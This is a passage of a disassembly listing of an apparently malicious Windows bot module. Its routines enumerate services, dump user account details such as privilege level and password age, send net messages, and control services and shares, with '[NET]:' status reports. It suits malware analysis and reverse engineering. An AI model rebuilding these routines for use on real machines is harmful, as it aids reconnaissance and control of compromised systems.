push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405C8D: ; CODE XREF: sub_405C4B+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405C97: ; CODE XREF: sub_405C4B+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CA1: ; CODE XREF: sub_405C4B+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_405C4B+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CB5: ; CODE XREF: sub_405C4B+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CBF: ; CODE XREF: sub_405C4B+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_405CEE
dec ecx
jz short loc_405CE7
dec ecx
jz short loc_405CE0
dec ecx
jnz loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_405C4B+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CE7: ; CODE XREF: sub_405C4B+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CEE: ; CODE XREF: sub_405C4B+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CF5: ; CODE XREF: sub_405C4B+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CFC: ; CODE XREF: sub_405C4B+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
jz short loc_405D5F
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_405DB3[ecx]
jmp ds:off_405D8B[ecx*4] ; switch jump
loc_405D20: ; DATA XREF: .text:off_405D8B�o
push offset aTheSpecifiedDa ; jumptable 00405D19 case 7
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D27: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceDepe ; jumptable 00405D19 case 17
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D2E: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceDe_0 ; jumptable 00405D19 case 10
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D35: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHasB ; jumptable 00405D19 case 0
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D3C: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheSpecified_0 ; jumptable 00405D19 case 2
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D43: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceCoul ; jumptable 00405D19 case 11
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D4A: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHa_0 ; jumptable 00405D19 case 14
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D51: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheRequested_1 ; jumptable 00405D19 case 3
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D58: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHasN ; jumptable 00405D19 case 4
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D5F: ; CODE XREF: sub_405C4B+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_405D64: ; CODE XREF: sub_405C4B+3D�j
; sub_405C4B+47�j ...
push offset dword_433860
call sub_412BB5
pop ecx
pop ecx
jmp short loc_405D85
; ---------------------------------------------------------------------------
loc_405D72: ; CODE XREF: sub_405C4B+32�j
; sub_405C4B+85�j ...
push eax ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_433860
call sub_412BB5
add esp, 0Ch
loc_405D85: ; CODE XREF: sub_405C4B+125�j
mov eax, offset dword_433860
retn
sub_405C4B endp
; ---------------------------------------------------------------------------
off_405D8B dd offset loc_405D35 ; DATA XREF: sub_405C4B+CE�r
dd offset loc_405D3C ; jump table for switch statement
dd offset loc_405D51
dd offset loc_405D58
dd offset loc_405D20
dd offset loc_405D2E
dd offset loc_405D43
dd offset loc_405D4A
dd offset loc_405D27
dd offset loc_405D72
byte_405DB3 db 0, 9, 1, 2 ; DATA XREF: sub_405C4B+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DC5 proc near ; CODE XREF: sub_4078FA+1C1D�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_43355C
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_405DFD: ; CODE XREF: sub_405DC5+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_43356C
test eax, eax
jnz short loc_405E37
call ds:dword_41F008
cmp eax, 0EAh
jnz loc_405EEE
loc_405E37: ; CODE XREF: sub_405DC5+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_405EE5
lea esi, [ebp+var_188]
loc_405E48: ; CODE XREF: sub_405DC5+11A�j
mov eax, [esi+8]
dec eax
jz short loc_405E94
dec eax
jz short loc_405E8D
dec eax
jz short loc_405E86
dec eax
jz short loc_405E7F
dec eax
jz short loc_405E78
dec eax
jz short loc_405E71
dec eax
lea eax, [ebp+var_20]
jz short loc_405E6A
push offset aUnknown_0 ; " Unknown"
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E6A: ; CODE XREF: sub_405DC5+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E71: ; CODE XREF: sub_405DC5+96�j
push offset aPausing ; " Pausing"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E78: ; CODE XREF: sub_405DC5+93�j
push offset aContinuing ; " Continuing"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E7F: ; CODE XREF: sub_405DC5+90�j
push offset aRunning ; " Running"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E86: ; CODE XREF: sub_405DC5+8D�j
push offset aStoping ; " Stoping"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E8D: ; CODE XREF: sub_405DC5+8A�j
push offset aStarting ; " Starting"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E94: ; CODE XREF: sub_405DC5+87�j
push offset aStopped ; " Stopped"
loc_405E99: ; CODE XREF: sub_405DC5+B1�j
; sub_405DC5+B8�j ...
lea eax, [ebp+var_20]
loc_405E9C: ; CODE XREF: sub_405DC5+A3�j
; sub_405DC5+AA�j
push eax
call sub_412BB5
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_405E48
loc_405EE5: ; CODE XREF: sub_405DC5+77�j
cmp [ebp+var_8], ebx
jnz loc_405DFD
loc_405EEE: ; CODE XREF: sub_405DC5+6C�j
push [ebp+var_C]
call dword_4334D0
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_405DC5 endp
; =============== S U B R O U T I N E =======================================
sub_405F05 proc near ; CODE XREF: sub_405FC7+A�p
; sub_405FC7+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_405F12
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405F12: ; CODE XREF: sub_405F05+9�j
push ebx
push esi
mov esi, ds:dword_41F0A8
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_413A90
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_405F05 endp
; =============== S U B R O U T I N E =======================================
sub_405F46 proc near ; CODE XREF: sub_40E9C5+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_41E8BA
call sub_413EF4
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_405F5D
xor eax, eax
jmp short loc_405FB9
; ---------------------------------------------------------------------------
loc_405F5D: ; CODE XREF: sub_405F46+11�j
push ebx
push ebp
push edi
mov edi, ds:dword_41F0AC
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi
test byte ptr dword_4338C0, 1
mov ebp, eax
jnz short loc_405F9E
or dword_4338C0, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_413A90
pop ecx
mov dword_4338BC, eax
loc_405F9E: ; CODE XREF: sub_405F46+3C�j
push esi
push esi
push ebp
push dword_4338BC
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi
mov eax, dword_4338BC
pop edi
pop ebp
pop ebx
loc_405FB9: ; CODE XREF: sub_405F46+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_405F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FC7 proc near ; CODE XREF: sub_406702+6C�p
; sub_40ECEC+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov edi, eax
call sub_405F05
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_413F30
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_405F05
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_433488
pop edi
leave
retn
sub_405FC7 endp
; =============== S U B R O U T I N E =======================================
sub_406032 proc near ; CODE XREF: sub_406702+20�p
; sub_40E9C5+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_405F05
push [esp+8+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4334A4
pop esi
retn
sub_406032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406055 proc near ; CODE XREF: sub_4068DF+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov edi, eax
call sub_405F05
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_405F05
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_43346C
pop edi
leave
retn
sub_406055 endp
; =============== S U B R O U T I N E =======================================
sub_4060AF proc near ; CODE XREF: sub_4068DF+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_405F05
push [esp+8+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
push eax
push esi
call dword_433568
pop esi
retn
sub_4060AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060D0 proc near ; CODE XREF: sub_4068DF+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_43348C
test eax, eax
mov [ebp+var_8], eax
jnz loc_40645D
mov eax, [ebp+var_4]
test eax, eax
jz loc_406498
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_412BB5
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_4061E9
dec eax
jz short loc_4061E2
dec eax
jz short loc_4061DB
mov eax, offset aUnknown ; "Unknown"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061DB: ; CODE XREF: sub_4060D0+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061E2: ; CODE XREF: sub_4060D0+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061E9: ; CODE XREF: sub_4060D0+FC�j
mov eax, offset aGuest ; "Guest"
loc_4061EE: ; CODE XREF: sub_4060D0+109�j
; sub_4060D0+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
add esp, 20h
pop edi
pop ebx
jmp short loc_406489
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4060D0+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_412BB5
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4045DD
add esp, 20h
loc_406489: ; CODE XREF: sub_4060D0+38B�j
cmp [ebp+var_4], 0
jz short loc_406498
push [ebp+var_4]
call dword_4334D8
loc_406498: ; CODE XREF: sub_4060D0+40�j
; sub_4060D0+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_4060D0 endp
; =============== S U B R O U T I N E =======================================
sub_40649E proc near ; CODE XREF: sub_4065CE+9E�p
; sub_406702:loc_406742�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_40654C
jz loc_406545
cmp eax, 7Bh
ja short loc_406511
jz short loc_406507
cmp eax, 5
jz short loc_4064FD
cmp eax, 8
jz short loc_4064F3
cmp eax, 32h
jz short loc_4064E9
cmp eax, 35h
jz short loc_4064DF
cmp eax, 57h
jnz loc_40659B
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064DF: ; CODE XREF: sub_40649E+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064E9: ; CODE XREF: sub_40649E+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064F3: ; CODE XREF: sub_40649E+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064FD: ; CODE XREF: sub_40649E+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406507: ; CODE XREF: sub_40649E+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406511: ; CODE XREF: sub_40649E+16�j
sub eax, 7Ch
jz short loc_40653E
sub eax, 7C8h
jz short loc_406537
dec eax
jz short loc_40652D
dec eax
jnz short loc_40659B
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_40652D: ; CODE XREF: sub_40649E+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406537: ; CODE XREF: sub_40649E+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40653E: ; CODE XREF: sub_40649E+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406545: ; CODE XREF: sub_40649E+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40654C: ; CODE XREF: sub_40649E+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_406585
jz short loc_40657E
sub eax, 8ADh
jz short loc_4065B0
dec eax
dec eax
jz short loc_406577
dec eax
jz short loc_406570
dec eax
dec eax
jnz short loc_40659B
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406570: ; CODE XREF: sub_40649E+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406577: ; CODE XREF: sub_40649E+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40657E: ; CODE XREF: sub_40649E+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406585: ; CODE XREF: sub_40649E+B5�j
sub eax, 8CAh
jz short loc_4065B7
sub eax, 17h
jz short loc_4065B0
sub eax, 25h
jz short loc_4065A9
sub eax, 29h
jz short loc_4065A2
loc_40659B: ; CODE XREF: sub_40649E+31�j
; sub_40649E+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065A2: ; CODE XREF: sub_40649E+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065A9: ; CODE XREF: sub_40649E+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065B0: ; CODE XREF: sub_40649E+BE�j
; sub_40649E+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_4065B7: ; CODE XREF: sub_40649E+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_4065BC: ; CODE XREF: sub_40649E+3C�j
; sub_40649E+46�j ...
push offset dword_4338C8
call sub_412BB5
pop ecx
pop ecx
mov eax, offset dword_4338C8
retn
sub_40649E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4065CE proc near ; CODE XREF: sub_4078FA+1DEF�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_4140FA
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_41F0B0
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_4140FA
lea eax, [ebp+var_71C]
push eax
call sub_413FEE
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_4334B4
test eax, eax
jnz short loc_40665E
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_433928
push esi
call sub_412BB5
pop ecx
pop ecx
jmp short loc_406685
; ---------------------------------------------------------------------------
loc_40665E: ; CODE XREF: sub_4065CE+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_40649E
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_433928
push esi
call sub_412BB5
add esp, 14h
loc_406685: ; CODE XREF: sub_4065CE+8E�j
mov eax, esi
pop esi
leave
retn
sub_4065CE endp
; =============== S U B R O U T I N E =======================================
sub_40668A proc near ; CODE XREF: sub_4078FA:loc_4094EC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4066E0
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42A400[esi]
push edi
push eax
call sub_405BA9
add esp, 14h
test eax, eax
jnz short loc_4066D2
push edi
push off_42A3FC[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_4066C2: ; CODE XREF: sub_40668A+54�j
mov esi, offset dword_433B28
push esi
call sub_412BB5
add esp, 10h
jmp short loc_4066FD
; ---------------------------------------------------------------------------
loc_4066D2: ; CODE XREF: sub_40668A+2A�j
call sub_405C4B
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_4066C2
; ---------------------------------------------------------------------------
loc_4066E0: ; CODE XREF: sub_40668A+C�j
lea eax, [eax+eax*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433B28
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_412BB5
add esp, 0Ch
loc_4066FD: ; CODE XREF: sub_40668A+46�j
pop edi
mov eax, esi
pop esi
retn
sub_40668A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406702 proc near ; CODE XREF: sub_4078FA:loc_4095D0�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_40679A
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_40672B
dec eax
jnz short loc_40677A
push edi
push 0
call sub_406032
pop ecx
pop ecx
jmp short loc_406776
; ---------------------------------------------------------------------------
loc_40672B: ; CODE XREF: sub_406702+18�j
cmp [ebp+arg_8], 0
jnz short loc_406768
push 24h
push edi
call sub_413F30
test eax, eax
pop ecx
pop ecx
jnz short loc_406768
push 57h
pop eax
loc_406742: ; CODE XREF: sub_406702+76�j
call sub_40649E
push eax
push edi
lea eax, [esi+esi*2]
push off_42A3F8[eax*4]
mov esi, offset dword_433D28
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_412BB5
add esp, 14h
jmp short loc_4067BA
; ---------------------------------------------------------------------------
